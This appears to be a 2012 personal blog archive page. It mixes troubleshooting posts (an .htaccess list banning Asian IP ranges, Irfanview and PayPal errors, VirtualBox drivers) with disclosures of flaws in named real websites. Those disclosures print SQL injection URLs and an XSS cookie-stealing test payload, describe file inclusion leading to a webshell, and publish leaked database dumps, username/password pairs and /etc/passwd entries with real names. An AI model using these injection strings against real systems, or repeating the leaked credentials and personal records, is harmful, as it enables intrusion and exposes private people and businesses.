Skip to main content


Showing posts from 2012

ban Asian ip addresses. Ban chinese spammers with htaccess

After receiving tons of spam on a few websites I've decided to ban the whole apnic addresses

Since I've not found anything to ban the whole APNIC I've searched for the assigned classes that they manage.
How to ban chinese spammers.

P.S. I've added a few LACNIC
(last update 2012-11-16)

Download here the file or just add the content in a .htaccess file and the spam from the Asia should be gone.
Put the .htaccess in the main (or any other) folder of your website.
You can use the same approach to ban any other ipv4 address space.

#list retrieved from

#Banning APNIC
deny from
deny from
deny from
deny from
deny from
deny from
deny from
deny from
deny from
deny from
deny from
deny from
deny from
deny from
deny from 106.0…

[Solved] Irfanview "disk is full" error

While using the batch processing of Irfanview you can encounter this error: "disk is full".
The error happens when you've set to overwrite thre previous files (advanced conversion settings) and they are *locked*.
Check if the file can be written by your Windows User, check that the file is not read only, check if the file is not locked by another process.

______________________Remove read only____________________
Right-click on the file.
Click on Properties.
Click on General tab, clear the Read-only check box, and then click OK (confirm also to apply to all the subfolders.

AMD PCNET Family PCI Ethernet Adapter - Windows XP, 2003 Drivers

It could happen that you cannot find the drivers (AMD PCNET Family PCI Ethernet Adapter - not installed) of the ethernet (nic) adapter that is used in  virtualbox.


I've found also this link but I was unable to see a working download.

Since the links to the amd websites are failing and it seems that they canno be found website I'm adding a new link.

Here you can download the  Drivers AMD PCNET for Virtualbox

They have been tested with Windows XP 32bit  and Virtualbox 4.2.0 r80737 .
After a bit of time I've tested them with Windows 7 pro 32bit (a slim version) and they work.
They also work on Windows 2003 R2 (thanks to David Acosta).

If you have a direct link to the AMD website or any other good information just add it in the comments. | XSS



An Sql injection was available in the login area of the forum of the previous website (in asp as far as I can remember).

Paypal PDT/IPN - HTTP Error 302

Paypal PDT/IPN - HTTP status Error 302 happens when you are contacting paypal via http while (as far as I can understand) they have enforced the requests to be via SSL (443 https)  and not in simple http requests (80 http).
It happens in sandbox and live.

Paypal PDT error 4003 problem

The Paypal error 4003 (when receiving PDT) could happen the server is doing too many requests/validations for the same "tx" (transaction id) with a cmd=_notify-synch. Paypal will not send back the data after about 5 requests.

Sometimes the error could happen randomly in sandbox. This shouldn't happen in "live".

Paypal merchant_return_link problem


it could happen if:
the client browser is clicking the button while not accepting/using/respecting the META tag redirection
the autoreturn is set to off in the the merchant account

an url rewriting could be a solution | Sql injections, data leak, system compromise

Since the website has been closed (I'm sorry for that).

Some (old) informations.

***Remember that I've never abused of any website or modified anything or used confidential data.***';%20trunca

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][Driver ODBC Microsoft Access] Errore di sintassi (operatore mancante) nell'espressione della query

/inc_ricerca.htm, line 12

--------------'0'9'9,1,2,3,6,4,4,5%20from%20user,%20name,%20'','','','','',''… | sql data dump, data leak

Too much data to dump. Anyway I've deleted everything (here ... ).
--- samples ---

company_address (
  company_id bigint(3) NOT NULL auto_increment,
  company_name varchar(200) NOT NULL default '',
  address longtext,
  street_id bigint(3) default NULL,
  city_id bigint(3) default NULL,
  state_id bigint(3) default NULL,
  zip varchar(20) default NULL,
  phone varchar(20) NOT NULL default '0',
  fax varchar(20) default NULL,
  email varchar(100) default NULL,
  category char(1) NOT NULL default '',
  PRIMARY KEY  (company_id)

INSERT INTO company_address VALUES("1", "M & A Hispanic Book Store", "1902 Bergenline Ave", "0", "16284", "30", "07087", "(201) 866-0010", "", "", "0");

------------------------------------------ (??? google ???) | sql data dump, data leak

I've found this data time ago...

CREATE TABLE partners (
  id int(11) NOT NULL auto_increment,
  email varchar(255) NOT NULL default '',
  phone varchar(50) default NULL,
  fax varchar(50) default NULL,
  address varchar(255) default NULL,
  zip varchar(20) default NULL,
  city varchar(50) default NULL,
  state varchar(50) default NULL,
  country varchar(50) default NULL,
  first_name varchar(100) default NULL,
  last_name varchar(100) default NULL,
  company_name varchar(100) default NULL,
  login varchar(25) NOT NULL default '',
  password varchar(25) NOT NULL default '',
  additional_data text,
  ku_balance float(16,2) unsigned NOT NULL default '0.00',
  us_balance float(16,2) unsigned NOT NULL default '0.00',
  credit_limit float(10,2) default '0.00',
  status enum('unconfirmed','active','suspended','free') default 'unconfirmed',
  promo varchar(100) default NULL,
  partner_group varchar(40… | Sql injection, data leak (sql dumps), system compromise

the website is dead so ... I can publish something

The main table

nurseryinfo (
   Title text,
   Initial text,
   First_Name text,
   Surname text,
   Contact_Name text,
   Position text,
   Nursery text,
   Address text,
   Address1 text,
   Town text,
   County text,
   Postcode text,
   Tel_No text,
   No_0_2 text,
   Range text,
   Weekly text,
   Tot_Staff text,
   Group_No text,
   Facility text,
   Member_No text,
   Branch text,
   Region text,
   Officer_Br text,
   Officer_Re text,
   Officer_Ex text,
   Year_Joined text,
   Eig text,
   Contact text,
   Task_Group text,
   _998 text,
   No_of_Nurs text,
   So text,
   Fax_No text,
   Renewed text,
   Bulletin text,
   E_Mail text,
   Mem_Type text,
   Fees_Paid text,
   Paid text,
   Month_Join text,
   Membership text,
   NDNA text,
   Chair text,
   Regional_R text,
   Chairtel_N text,
   Rep_Tel_No text,
   Ass text,
   Primary_ text,
   Add_site text,
   Head_offic text,
   No_2_3 int(11),
   No_3_5 int(11),
   No_5 in… | SQL Injection

Since the injection have been fixed time ago ... I just publish some samples (nothing confidential)

Sample error
[TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY N1 ASC, ID_Head DESC' at line 1

/ita/web/index.asp, line 15

db: Sql39909_2
sample table -> clienti
columns -> cliente, indirizzo, data, telefono

sample injection*%20from%20Sql39909_2.clienti/*&menu=Newa

old hosts (2003/2004?)…

old joe accounts of free websites  U: angelo  P: angelo  U: apostolo  P: apostolo  U: arny  P: arny  U: basa  P: basa  U: bedford  P: bedford  U: bonnin  P: bonnin  U: bubak  P: bubak  U: bucky  P: bucky  U: carlton  P: carlton  U: cora  P: cora  U: cozzi  P: cozzi  U: derby  P: derby  U: elin  P: elin  U: emr  P: emr  U: evelina  P: evelina  U: evita  P: evita  U: fania  P: fania  U: fara  P: fara  U: federico  P: federico  U: ferdy  P: ferdy  U: fisher  P: fisher  U: francine  P: francine  U: gareth  P: gareth  U: gonzalez  P: gonzalez  U: gussy  P: gussy  U: h…

Old accounts, dead websites, old passwd  U/P: ynws  U/P: daeil24
ftp:x:14:50:FTP User:/var/ftp:
rpc:x:32:32:Portmapper RPC user:/:/bin/false
schnakey:x:514:920:Eberle Frank:/home/schnakey:/bin/bash
pr0t3ct:x:516:920:Jeske Joerg:/hom… | data leak, system compromise, HTTP splitting, XSS.

-Data leak-

we can see the full path within the errors
-> C:\Inetpub\wwwroot\yordambt
ex file: _dil.php | index.php | liste.php | _yardim.php | arama.php | anasayfa.php | url.php

After getting access through a lfi it's possible to see that we are on a (windows) box with the default configuration, with the permissions for -everybody- in some important folders. It's possible to operate quite like an administrator with a simple -webshell- script
There are some shared folders without password on other boxes

The scripts available from the website are (also… | XSS

this xss is locked by the webserver<script>alert(document.cookie);</script>&Go.x=0&Go.y=0

this one is working without problems because there's a javascript that is using the input without sanitizing it. It seems that only the first ' single quote is escaped.... and we add another one.

The problem is within "Search Engine Builder 2010" | Flash XSS - Sql Injections - possible upload of scripts - administrator privileges escalation (system compromise)

(they are not working anymore - check webcaches)
xss in the requests (simple)

Sql injection (there's no need to write the injection string ... it's very simple)

after *login* it's possible to upload anything that will be available in